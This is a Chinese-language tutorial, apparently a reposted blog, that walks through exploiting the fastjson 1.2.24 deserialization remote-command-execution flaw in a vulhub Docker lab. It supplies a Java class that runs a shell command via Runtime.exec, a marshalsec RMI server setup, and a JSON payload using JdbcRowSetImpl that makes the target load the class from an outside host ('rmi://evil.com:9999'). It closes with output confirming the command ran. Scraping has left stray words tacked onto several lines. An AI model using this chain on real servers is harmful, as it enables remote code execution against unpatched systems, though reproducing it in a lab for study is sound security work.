fastjson 1.2.24 反序列化致使任意命令执行漏洞

2022年01月14日 阅读数:6
这篇文章主要向大家介绍fastjson 1.2.24 反序列化致使任意命令执行漏洞,主要内容包括基础应用、实用技巧、原理机制等方面,希望对大家有所帮助。

fastjson 1.2.24 反序列化致使任意命令执行漏洞

环境搭建vulhub一键启动

https://vulhub.org/#/environments/fastjson/1.2.24-rce/java

docker-compose up -dpython

访问本地ip的8090端口
在这里插入图片描述git

1.bp抓包发现对象转换成json格式数据

在这里插入图片描述

2.更换数据测试

右键 change request method 改为post发包,类型改成json
在这里插入图片描述github

3.创建rmi服务器

保存java恶意代码以下,(执行 touch /tmp/success)web

// javac TouchFile.java
import java.lang.Runtime;
import java.lang.Process;

public class TouchFile {
    static {
        try {
            Runtime rt = Runtime.getRuntime();
            String[] commands = {"touch", "/tmp/success"};
            Process pc = rt.exec(commands);
            pc.waitFor();
        } catch (Exception e) {
            // do nothing
        }
    }
}
image-20211130165049496

在这里插入图片描述

编译代码,注意此环境须要jdk1.8环境编译,kail默认是11.0版本,须要安装jdk1.8(略),而且选择使用jdk1.8docker

┌──(root💀kali)-[~]
└─# update-alternatives --config java
有 2 个候选项可用于替换 java (提供 /usr/bin/java)。

  选择       路径                                       优先级  状态
------------------------------------------------------------
* 0            /usr/lib/jvm/java-11-openjdk-amd64/bin/java   1111      自动模式
  1            /usr/lib/jvm/java-11-openjdk-amd64/bin/java   1111      手动模式
  2            /usr/local/jdk1.8/jdk1.8.0_161/bin/java       1         手动模式

要维持当前值[*]请按<回车键>,或者键入选择的编号:2
update-alternatives: 使用 /usr/local/jdk1.8/jdk1.8.0_161/bin/java 来在手动模式中提供 /usr/bin/java (java)
                                                                                                                                                              
┌──(root💀kali)-[~]
└─# java -version                                                                                        
java version "1.8.0_161"
Java(TM) SE Runtime Environment (build 1.8.0_161-b12)
Java HotSpot(TM) 64-Bit Server VM (build 25.161-b12, mixed mode)
                                                                   

在这里插入图片描述

javac  编译生成class文件

在这里插入图片描述

当前目录使用python搭建web,发布编译好的文件json

 python3 -m http.server 8888

在这里插入图片描述

使用工具marshalsec 搭建rmi服务器tomcat

git clone https://github.com/mbechler/marshalsec.git
cd marshalse
mvn clean package -DskipTests   (须要等待一会),要安装maven  apt-git installmaven

在这里插入图片描述

咱们借助marshalsec项目,启动一个RMI服务器,监听9999端口,并制定加载远程类TouchFile.classbash

须要把marshalsec-0.0.3-SNAPSHOT-all.jar拷贝到恶意代码目录服务器

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://192.168.8.143:8888/#TouchFile" 9999 

在这里插入图片描述

向靶场服务器发送Payload,带上RMI的地址:evil.com改成rmi服务器ip

POST / HTTP/1.1
Host: your-ip:8090
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 160

{
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"rmi://evil.com:9999/TouchFile",
        "autoCommit":true
    }
}

在这里插入图片描述

进入容器发现tmp下有success,反序列化命令执行成功

──(root💀kali)-[~]
└─# docker ps                                                                                                                                           130 ⨯
CONTAINER ID   IMAGE                    COMMAND                  CREATED        STATUS          PORTS                    NAMES
66effc71796b   vulhub/fastjson:1.2.24   "java -Dserver.addre…"   19 hours ago   Up 24 minutes   0.0.0.0:8090->8090/tcp   1224-rce_web_1
                                                                                                                                                              
┌──(root💀kali)-[~]
└─# docker exec -it 66effc71796b /bin/bash
root@66effc71796b:/# cd tmp/
root@66effc71796b:/tmp# ls
hsperfdata_root  tomcat-docbase.3017740528426830119.8090  tomcat.1457512698342180460.8090
success          tomcat-docbase.3871276941847431940.8090  tomcat.2826139588232407997.8090
root@66effc71796b:/tmp# 

在这里插入图片描述